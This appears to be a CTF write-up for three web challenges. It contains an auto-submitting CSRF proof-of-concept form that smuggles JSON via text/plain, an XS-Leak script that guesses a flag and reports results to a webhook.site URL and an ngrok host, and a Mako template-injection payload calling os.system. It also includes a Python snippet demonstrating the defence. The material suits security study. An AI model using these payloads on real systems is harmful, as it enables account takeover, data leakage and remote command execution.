fxxkcors
A CSRF challenge. I had not done one before, so I studied it. The rough idea is to make the bot visit this form; once it submits, privileges are escalated. The form uses `enctype="text/plain"` so that the field name and value glue together into a valid JSON body the API accepts.

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
      <!-- body sent: {"username":"skr","test":"="} -->
      <input type="hidden" name='{"username":"skr","test":"' value='"}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
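An added Python example (not from the writeup, and not the challenge's PHP) that shows why the text/plain form body parses as JSON on the server, and the check a JSON endpoint should apply so that a plain HTML form cannot drive it: require `Content-Type: application/json` (a form cannot set that, so cross-site callers hit a CORS preflight) and allow-list the `Origin` header. The allowed origin is taken from the form action above; the handler logic is assumed.

```python
import json

# Origin of the target API, taken from the form action in the PoC above.
ALLOWED_ORIGIN = "http://124.71.205.122:10002"


def text_plain_form_body(fields):
    """Body a browser sends for enctype="text/plain": 'name=value' per field, CRLF-terminated."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def smuggled_json(fields):
    """Parse the glued form body the way a naive JSON endpoint would."""
    return json.loads(text_plain_form_body(fields))


def accept_json_request(headers, body, allowed_origin=ALLOWED_ORIGIN):
    """Hardened acceptance check for a JSON API. Returns (accepted, reason).

    A <form> can only send text/plain, urlencoded or multipart bodies, so demanding
    application/json rules out form-driven CSRF; the Origin allow-list rejects the
    remaining cross-site callers (browsers send Origin on every POST).
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    ctype = lowered.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "content-type is not application/json"
    origin = lowered.get("origin")
    if origin is None:
        return False, "missing Origin header"
    if origin != allowed_origin:
        return False, "cross-site origin"
    try:
        data = json.loads(body)
    except ValueError:
        return False, "body is not JSON"
    if not isinstance(data, dict) or "username" not in data:
        return False, "unexpected JSON shape"
    return True, "ok"


if __name__ == "__main__":
    # Constructed input: the exact name/value pair from the PoC form.
    poc_fields = [('{"username":"skr","test":"', '"}')]
    print(repr(text_plain_form_body(poc_fields)), smuggled_json(poc_fields))
    print(accept_json_request({"Content-Type": "text/plain"}, text_plain_form_body(poc_fields)))
```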
ez_note
A navigation-type XS-Leak: the number of history entries in the opened window reveals whether the search page redirected, which leaks whether the guessed flag prefix matched.
https://xsleaks.dev/docs/attacks/navigations/
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="robots" content="noindex">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
</head>
<body>
<script>
  var flag = 'SUSCTF{'

  // Report a result to the listener.
  function send(msg) {
    fetch('https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b?msg=' + encodeURIComponent(msg))
  }

  // Open the search page with one guessed prefix, then navigate the window to our own page
  // and compare history.length: a redirect on the search page adds an extra entry.
  function trying(keyword) {
    return new Promise(resolve => {
      var win = window.open('http://123.60.29.171:10001/search?q=' + keyword)
      setTimeout(() => {
        win.location = 'http://e050-220-133-126-220.ngrok.io/non.html'
        setTimeout(() => {
          if (win.history.length === 3) {
            send('success:' + keyword)
          }
          win.close()
          resolve()   // the original never resolved the promise
        }, 1000)
      }, 1500)
    })
  }

  async function run() {
    send('start')
    let chars = '_abcdefghijklmnopqrstuv'.split('')
    for (let char of chars) {
      const temp = flag + char
      await trying(temp)   // test one prefix at a time
    }
  }

  setTimeout(() => { run() }, 1000)
</script>
</body>
</html>
```
HTML practice
Entering `##` makes the page render blank (Mako treats `##` as a line comment), which identifies the template engine as Mako.
The statement below executes a command, but its output is not echoed; the output can be written to a file in another directory with the shell redirection operator.

```
% for a in (self.module.cache.util.os.system(name),2,3):
1
% endfor
```